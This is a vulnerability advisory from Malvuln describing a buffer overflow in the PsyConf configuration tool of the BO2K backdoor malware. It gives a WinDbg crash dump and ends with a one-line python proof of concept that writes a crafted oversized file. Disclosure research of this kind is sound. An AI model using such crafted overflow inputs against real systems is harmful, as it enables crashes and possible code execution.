Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/ca4e5a6ff033b62fa59de5a5dd24c7f9.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.BO2K.ab Vulnerability: Local File Buffer Overflow Description: PsyConf - Program configuration tool doesnt properly check the executables it parses. Loading a specially crafted file triggers a buffer overflow overwriting ECX register etc. Type: PE32 MD5: ca4e5a6ff033b62fa59de5a5dd24c7f9 Vuln ID: MVID-2021-0119 Dropped files: ASLR: False DEP: False Safe SEH: True Disclosure: 03/02/2021 Memory Dump: (414.e80): Unknown exception - code c000041d (first/second chance not available) eax=001c0000 ebx=023655c0 ecx=41414141 edx=00000000 esi=0019fe0c edi=74de3cf0 eip=00401e17 esp=0019f3c0 ebp=0019f604 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 *** WARNING: Unable to verify checksum for Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1e17: 00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h] ds:002b:415d4191=???????? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17 00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00401e17 (Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x00001e17) ExceptionCode: c000041d ExceptionFlags: 00000001 NumberParameters: 0 PROCESS_NAME: Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe ERROR_CODE: (NTSTATUS) 0xc000041d - An unhandled exception was encountered during a user callback. EXCEPTION_CODE: (NTSTATUS) 0xc000041d - An unhandled exception was encountered during a user callback. MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000e80 BUGCHECK_STR: APPLICATION_FAULT_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 0040ff6f to 00401e17 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0019f604 0040ff6f 0019fe0c 000003e8 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1e17 0019f634 004103af 000003e8 00000000 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0xff6f 0019f658 00412819 000003e8 00000000 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x103af 0019f6a8 00412258 00000000 000a07fe 0019fe0c Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x12819 0019f724 0041220a 00000111 000003e8 000a07fe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x12258 0019f744 00411325 00000111 000003e8 000a07fe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1220a 0019f7a4 0041152d 00000000 001307ba 00000111 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x11325 0019f7c0 761147ab 001307ba 00000111 000003e8 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1152d 0019f7ec 760f52ac 00411502 001307ba 00000111 user32!_InternalCallWinProc+0x2b 0019f8d0 760f4e4a 00411502 00000000 00000111 user32!UserCallWinProcCheckWow+0x3ac 0019f934 760fe4cf 00c8edc0 00000000 00000111 user32!DispatchClientMessage+0xea 0019f970 770e537d 0019f98c 00000020 0019fc5c user32!__fnDWORD+0x3f 0019f9a8 76052c0c 760f4c18 001307ba 00000111 ntdll!KiUserCallbackDispatcher+0x4d 0019f9ac 760f4c18 001307ba 00000111 000003e8 win32u!NtUserMessageCall+0xc 0019fa10 760f4723 00c8edc0 00000000 000a07fe user32!SendMessageWorker+0x3b8 0019fa44 761303ee 001307ba 00000111 000003e8 user32!SendMessageW+0x123 0019fa68 761300f3 00ca0690 00000000 00000000 user32!xxxButtonNotifyParent+0x54 0019fa90 7612f5f8 004ed7f0 00000000 00ca0690 user32!xxxBNReleaseCapture+0x141 0019fb30 7612ea92 00ca0690 00000000 00000202 user32!ButtonWndProcWorker+0xad8 0019fb5c 761147ab 000a07fe 00000202 00000000 user32!ButtonWndProcA+0x52 0019fb88 760f52ac 7612ea40 000a07fe 00000202 user32!_InternalCallWinProc+0x2b 0019fc6c 760f43fe 7083c410 00007ffb 00000202 user32!UserCallWinProcCheckWow+0x3ac 0019fce0 760f8401 00000000 004205e8 004205e0 user32!DispatchMessageWorker+0x20e 0019fd14 76110d5e 001307ba 004205e0 004205e0 user32!IsDialogMessageW+0x101 0019fd40 00413a80 001307ba 004205e0 0019fe0c user32!IsDialogMessageA+0x4e 004205e0 00000000 00000000 00140028 4a60bbbc Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x13a80 FOLLOWUP_IP: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17 00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h] SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9 IMAGE_NAME: Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe DEBUG_FLR_IMAGE_TIMESTAMP: 396c698b STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb FAILURE_BUCKET_ID: FILL_PATTERN_41414141_c000041d_Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe!Unknown BUCKET_ID: APPLICATION_FAULT_FILL_PATTERN_41414141_Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17 Exploit/PoC: python -c "print( 'MZ'+'A'*72000)" > dirty0tis.exe Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).